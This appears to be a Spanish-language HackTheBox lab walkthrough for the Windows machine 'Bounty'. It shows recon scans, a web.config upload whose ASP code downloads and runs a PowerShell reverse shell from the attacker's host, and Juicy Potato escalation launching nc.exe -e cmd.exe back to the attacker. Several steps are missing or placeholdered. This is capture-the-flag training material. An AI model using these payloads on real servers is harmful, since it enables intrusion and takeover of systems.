Cu3rv0x
Bounty

Bounty


HTB Windows

echo “10.129.154.47 bounty.htb” | sudo tee -a /etc/hosts nmap -A -p- -oA output 10.129.154.47 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA bounty 10.129.154.47

nmap -sU -O -p- -oA bounty-udp 10.129.154.47

nikto -h 10.129.154.47:80

ssh_command.

usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx

ssh_command.

ssh_command.

ssh_command.

Subo un archivo jpeg y sale que fue exitoso

ssh_command.

ssh_command.

Trate de usar un archivo asp y aspx pero me salio un error

Lo raro es que si acepta archivos de web.config que es un archivo con ajustes para aplicaciones en IIS. Es como .htaccess para los servidores de Apache.

https://raw.githubusercontent.com/tennc/webshell/master/aspx/web.config

ssh_command.

vim Invoke-PowerShellTcp.ps1

cambiamos la ultima linea a la ip de tu maquina de kali

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.116 -Port 4444 Cambiamos el web.config en la parte de abajo para que diga lo siguiente:

<% Set rs = CreateObject(“WScript.Shell”) Set cmd = rs.Exec(“cmd /c powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.116:1337/Invoke-PowerShellTcp.ps1’)”) o = cmd.StdOut.Readall() Response.write(o) %> python3 -m htt.server 1337

ssh_command.

cd c: mkdir tmp cd tmp whoami /priv

ssh_command.

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

Bajamos archivos de la maquina de kali a la maquina de windows

ssh_command.

./juicy.exe -l 1337 -p c:\windows\system32\cmd.exe -a “/c C:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.XX.XX 1337” -t * ssh_command.

nc -lvnp 1337

ssh_command.

© 2025 Cu3rv0x